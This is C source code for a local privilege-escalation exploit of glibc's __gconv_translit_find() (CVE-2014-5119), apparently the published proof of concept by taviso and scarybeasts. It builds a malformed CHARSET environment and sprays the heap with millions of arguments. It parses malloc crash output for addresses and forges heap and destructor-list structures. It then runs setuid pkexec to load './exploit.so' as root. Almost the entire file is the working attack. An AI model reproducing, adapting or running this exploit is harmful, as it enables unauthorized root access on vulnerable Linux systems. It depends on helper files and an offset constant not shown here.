glibc -2014

1. #define _GNU_SOURCE
2. #include <err.h>
3. #include <stdio.h>
4. #include <fcntl.h>
5. #include <errno.h>
6. #include <dlfcn.h>
7. #include <stdlib.h>
8. #include <string.h>
9. #include <unistd.h>
10. #include <stdint.h>
11. #include <assert.h>
12. #include <stdarg.h>
13. #include <stddef.h>
14. #include <signal.h>
15. #include <string.h>
16. #include <termios.h>
17. #include <stdbool.h>
18. #include <sys/user.h>
19. #include <sys/stat.h>
20. #include <sys/ioctl.h>
21. #include <sys/types.h>
22. #include <sys/ptrace.h>
23. #include <sys/utsname.h>
24. #include <sys/resource.h>
25.  
26. // Minimal environment to trigger corruption in __gconv_translit_find().
27. static char * const kCorruptCharsetEnviron[] = {
28. "CHARSET=//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA",
29. NULL,
30. };
31.  
32. static const struct rlimit kRlimMax = {
33. .rlim_cur = RLIM_INFINITY,
34. .rlim_max = RLIM_INFINITY,
35. };
36.  
37. static const struct rlimit kRlimMin = {
38. .rlim_cur = 1,
39. .rlim_max = 1,
40. };
41.  
42. // A malloc chunk header.
43. typedef struct {
44. size_t prev_size;
45. size_t size;
46. uintptr_t fd;
47. uintptr_t bk;
48. uintptr_t fd_nextsize;
49. uintptr_t bk_nextsize;
50. } mchunk_t;
51.  
52. // A tls_dtor_list node.
53. typedef struct {
54. uintptr_t func;
55. uintptr_t obj;
56. uintptr_t map;
57. uintptr_t next;
58. } dlist_t;
59.  
60. // The known_trans structure glibc uses for transliteration modules.
61. typedef struct {
62. uint8_t info[32];
63. char *fname;
64. void *handle;
65. int open_count;
66. } known_t;
67.  
68. enum {
69. LOG_DEBUG,
70. LOG_WARN,
71. LOG_ERROR,
72. LOG_FATAL,
73. };
74.  
75. // Round up an integer to the next PAGE_SIZE boundary.
76. static inline uintptr_t next_page_size(uintptr_t size)
77. {
78. return (size + PAGE_SIZE - 1) & PAGE_MASK;
79. }
80.  
81. // Allocate a buffer of specified length, starting with s, containing c, terminated with t.
82. static void * alloc_repeated_string(size_t length, int s, int c, int t)
83. {
84. return memset(memset(memset(malloc(length), t, length), c, length - 1), s, 1);
85. }
86.  
87. static void logmessage(int level, const char * format, ...)
88. {
89. va_list ap;
90.  
91. switch (level) {
92. case LOG_DEBUG: fprintf(stderr, "[*] "); break;
93. case LOG_WARN: fprintf(stderr, "[*] "); break;
94. case LOG_ERROR: fprintf(stderr, "[!] "); break;
95. }
96.  
97. va_start(ap, format);
98. vfprintf(stderr, format, ap);
99. va_end(ap);
100.  
101. fputc('\n', stderr);
102.  
103. if (level == LOG_ERROR) {
104. _exit(EXIT_FAILURE);
105. }
106. }
107.  
108. // Parse a libc malloc assertion message to extract useful pointers.
109. //
110. // Note, this isn't to defeat ASLR, it just makes it more portable across
111. // different system configurations. ASLR is already nullified using rlimits,
112. // although technically even that isn't necessary.
113. static int parse_fatal_error(uintptr_t *chunkptr, uintptr_t *baseaddr, uintptr_t *bssaddr, uintptr_t *libcaddr)
114. {
115. FILE *pty;
116. char *mallocerror;
117. char *memorymap;
118. char *line;
119. char *prev;
120. char message[1 << 14];
121. char *anon = NULL;
122. char r, w, x, s;
123. ssize_t count;
124. int status;
125. uintptr_t mapstart;
126. uintptr_t mapend;
127.  
128. // Unfortunately, glibc writes it's error messaged to /dev/tty. This cannot
129. // be changed in setuid programs, so this wrapper catches tty output.
130. while (true) {
131. // Reset any previous output.
132. memset(message, 0, sizeof message);
133.  
134. logmessage(LOG_DEBUG, "Attempting to invoke pseudo-pty helper (this will take a few seconds)...");
135.  
136. if ((pty = popen("./pty", "r")) == NULL) {
137. logmessage(LOG_ERROR, "failed to execute pseudo-pty helper utility, cannot continue");
138. }
139.  
140. if ((count = fread(message, 1, sizeof message, pty)) <= 0) {
141. logmessage(LOG_ERROR, "failed to read output from pseudo-pty helper, %d (%m)", count, message);
142. }
143.  
144. logmessage(LOG_DEBUG, "Read %u bytes of output from pseudo-pty helper, parsing...", count);
145.  
146. pclose(pty);
147.  
148. mallocerror = strstr(message, "corrupted double-linked list");
149. memorymap = strstr(message, "======= Memory map: ========");
150.  
151. // Unfortunately this isn't reliable, keep trying until it works.
152. if (mallocerror == NULL || memorymap == NULL) {
153. logmessage(LOG_WARN, "expected output missing (this is normal), trying again...");
154. continue;
155. }
156.  
157. logmessage(LOG_DEBUG, "pseudo-pty helper succeeded");
158. break;
159. }
160.  
161. *baseaddr = 0;
162. *chunkptr = 0;
163. *bssaddr = 0;
164. *libcaddr = 0;
165.  
166. logmessage(LOG_DEBUG, "attempting to parse libc fatal error message...");
167.  
168. // Verify this is a message we understand.
169. if (!mallocerror || !memorymap) {
170. logmessage(LOG_ERROR, "unable to locate required error messages in crash dump");
171. }
172.  
173. // First, find the chunk pointer that malloc doesn't like
174. if (sscanf(mallocerror, "corrupted double-linked list: %p ***", chunkptr) != 1) {
175. logmessage(LOG_ERROR, "having trouble parsing this error message: %.20s", mallocerror);
176. };
177.  
178. logmessage(LOG_DEBUG, "discovered chunk pointer from `%.20s...`, => %p", mallocerror, *chunkptr);
179. logmessage(LOG_DEBUG, "attempting to parse the libc maps dump...");
180.  
181. // Second, parse maps.
182. for (prev = line = memorymap; line = strtok(line, "\n"); prev = line, line = NULL) {
183. char filename[32];
184.  
185. // Reset filename.
186. memset(filename, 0, sizeof filename);
187.  
188. // Just ignore the banner printed by glibc.
189. if (strcmp(line, "======= Memory map: ========") == 0) {
190. continue;
191. }
192.  
193. if (sscanf(line, "%08x-%08x %c%c%c%c %*8x %*s %*u %31s", &mapstart, &mapend, &r, &w, &x, &s, filename) >= 1) {
194. // Record the last seen anonymous map, in case the kernel didn't tag the heap.
195. if (strlen(filename) == 0) {
196. anon = line;
197. }
198.  
199. // If the kernel did tag the heap, then everything is easy.
200. if (strcmp(filename, "[heap]") == 0) {
201. logmessage(LOG_DEBUG, "successfully located first morecore chunk w/tag @%p", mapstart);
202. *baseaddr = mapstart;
203. }
204.  
205. // If it didn't tag the heap, then we need the anonymous chunk before the stack.
206. if (strcmp(filename, "[stack]") == 0 && !*baseaddr) {
207. logmessage(LOG_WARN, "no [heap] tag was found, using heuristic...");
208. if (sscanf(anon, "%08x-%*08x %*c%*c%*c%*c %*8x %*s %*u %31s", baseaddr, filename) < 1) {
209. logmessage(LOG_ERROR, "expected to find heap location in line `%s`, but failed", anon);
210. }
211. logmessage(LOG_DEBUG, "located first morecore chunk w/o tag@%p", *baseaddr);
212. }
213.  
214. if (strcmp(filename, "/usr/lib/libc-2.18.so") == 0 && x == 'x') {
215. logmessage(LOG_DEBUG, "found libc.so mapped @%p", mapstart);
216. *libcaddr = mapstart;
217. }
218.  
219. // Try to find libc bss.
220. if (strlen(filename) == 0 && mapend - mapstart == 0x102000) {
221. logmessage(LOG_DEBUG, "expecting libc.so bss to begin at %p", mapstart);
222. *bssaddr = mapstart;
223. }
224. continue;
225. }
226.  
227. logmessage(LOG_ERROR, "unable to parse maps line `%s`, quiting", line);
228. break;
229. }
230.  
231. return (*chunkptr == 0 || *baseaddr == 0 || *bssaddr == 0 || *libcaddr == 0) ? 1 : 0;
232. }
233.  
234. static const size_t heap_chunk_start = 0x506c8008;
235. static const size_t heap_chunk_end = 0x506c8008 + (2 * 1024 * 1024);
236.  
237. static const size_t nstrings = 15840000;
238.  
239. // The offset into libc-2.18.so BSS of tls_dtor_list.
240. static const uintptr_t kTlsDtorListOffset = 0x12d4;
241.  
242. // The DSO we want to load as euid 0.
243. static const char kExploitDso[] = "./exploit.so";
244.  
245. int main(int argc, const char* argv[])
246. {
247. uintptr_t baseaddr;
248. uintptr_t chunkptr;
249. uintptr_t bssaddr;
250. uintptr_t libcaddr;
251. uint8_t *param;
252. char **args;
253. dlist_t *chain;
254. struct utsname ubuf;
255.  
256. // Look up host type.
257. if (uname(&ubuf) != 0) {
258. logmessage(LOG_ERROR, "failed to query kernel information");
259. }
260.  
261. logmessage(LOG_DEBUG, "---------------------------------------------------");
262. logmessage(LOG_DEBUG, "CVE-2014-5119 glibc __gconv_translit_find() exploit");
263. logmessage(LOG_DEBUG, "------------------------ taviso & scarybeasts -----");
264.  
265. // Print some warning that this isn't going to work on Ubuntu.
266. if (access("/etc/fedora-release", F_OK) != 0 || strcmp(ubuf.machine, "i686") != 0)
267. logmessage(LOG_WARN, "This proof of concept is designed for 32 bit Fedora 20");
268.  
269. // Extract some useful pointers from glibc error output.
270. if (parse_fatal_error(&chunkptr, &baseaddr, &bssaddr, &libcaddr) != 0) {
271. logmessage(LOG_ERROR, "unable to parse libc fatal error message, please try again.");
272. }
273.  
274. logmessage(LOG_DEBUG, "allocating space for argument structure...");
275.  
276. // This number of "-u" arguments is used to spray the heap.
277. // Each value is a 59-byte string, leading to a 64-byte heap chunk, leading to a stable heap pattern.
278. // The value is just large enough to usuaully crash the heap into the stack without going OOM.
279. if ((args = malloc(((nstrings * 2 + 3) * sizeof(char *)))) == NULL) {
280. logmessage(LOG_ERROR, "allocating argument structure failed");
281. }
282.  
283. logmessage(LOG_DEBUG, "creating command string...");
284.  
285. args[nstrings * 2 + 1] = alloc_repeated_string(471, '/', 1, 0);
286. args[nstrings * 2 + 2] = NULL;
287.  
288. logmessage(LOG_DEBUG, "creating a tls_dtor_list node...");
289.  
290. // The length 59 is chosen to cause a 64byte allocation by stdrup. That is
291. // a 60 byte nul-terminated string, followed by 4 bytes of metadata.
292. param = alloc_repeated_string(59, 'A', 'A', 0);
293. chain = (void *) param;
294.  
295. logmessage(LOG_DEBUG, "open_translit() symbol will be at %p", libcaddr + _OPEN_TRANSLIT_OFF);
296. logmessage(LOG_DEBUG, "offsetof(struct known_trans, fname) => %u", offsetof(known_t, fname));
297.  
298. chain->func = libcaddr + _OPEN_TRANSLIT_OFF;
299. chain->obj = baseaddr + 8 + sizeof(*chain) - 4 - offsetof(known_t, fname);
300. chain->map = baseaddr + 8 + sizeof(*chain);
301. chain->next = baseaddr + 8 + 59 - strlen(kExploitDso);
302.  
303. logmessage(LOG_DEBUG, "appending `%s` to list node", kExploitDso);
304.  
305. memcpy(param + 59 - strlen(kExploitDso), kExploitDso, 12);
306.  
307. logmessage(LOG_DEBUG, "building parameter list...");
308. for (int i = 0; i < nstrings; ++i) {
309. args[i*2 + 1] = "-u";
310. args[i*2 + 2] = (void *) chain;
311. }
312.  
313. // Verify we didn't sneak in a NUL.
314. assert(memchr(chain, 0, sizeof(chain)) == NULL);
315.  
316. logmessage(LOG_DEBUG, "anticipating tls_dtor_list to be at %p", bssaddr + kTlsDtorListOffset);
317.  
318. // Spam all of possible chunks (some are unfortunately missed).
319. for (int i = 0; true; i++) {
320. uintptr_t chunksize = 64;
321. uintptr_t chunkaddr = baseaddr + i * chunksize;
322. uintptr_t targetpageoffset = chunkptr & ~PAGE_MASK;
323. uintptr_t chunkpageoffset = PAGE_MASK;
324. uintptr_t mmapbase = 31804 + ((0xFD8 - targetpageoffset) / 32);
325. uint8_t *param = NULL;
326. mchunk_t chunk = {
327. .prev_size = 0xCCCCCCCC,
328. .size = 0xDDDDDDDD,
329. .fd_nextsize = bssaddr + kTlsDtorListOffset - 0x14,
330. .bk_nextsize = baseaddr + 8,
331. };
332.  
333. // Compensate for heap metadata every 1MB of allocations.
334. chunkaddr += 8 + (i / (1024 * 1024 / chunksize - 1) * chunksize);
335.  
336. if (chunkaddr < heap_chunk_start)
337. continue;
338.  
339. if (chunkaddr > heap_chunk_end)
340. break;
341.  
342. chunkpageoffset = chunkaddr & ~PAGE_MASK;
343.  
344. if (chunkpageoffset > targetpageoffset) {
345. continue;
346. }
347.  
348. if (targetpageoffset - chunkpageoffset > chunksize) {
349. continue;
350. }
351.  
352. // Looks like this will fit, compensate the pointers for alignment.
353. chunk.fd = chunk.bk = chunkaddr + (targetpageoffset - chunkpageoffset);
354.  
355. if (memchr(&chunk, 0, sizeof chunk)) {
356. logmessage(LOG_WARN, "parameter %u would contain a nul, skipping", i);
357. continue;
358. }
359. args[mmapbase + i * 2] = param = alloc_repeated_string(60, 'A', 'A', 0);
360.  
361. memcpy(param + (targetpageoffset - chunkpageoffset),
362. &chunk,
363. sizeof chunk);
364. }
365.  
366. setrlimit(RLIMIT_STACK, &kRlimMax);
367. setrlimit(RLIMIT_DATA, &kRlimMin);
368.  
369. args[0] = "pkexec";
370.  
371. logmessage(LOG_DEBUG, "execvpe(%s...)...", args[0]);
372. execvpe("pkexec", args, kCorruptCharsetEnviron);
373. }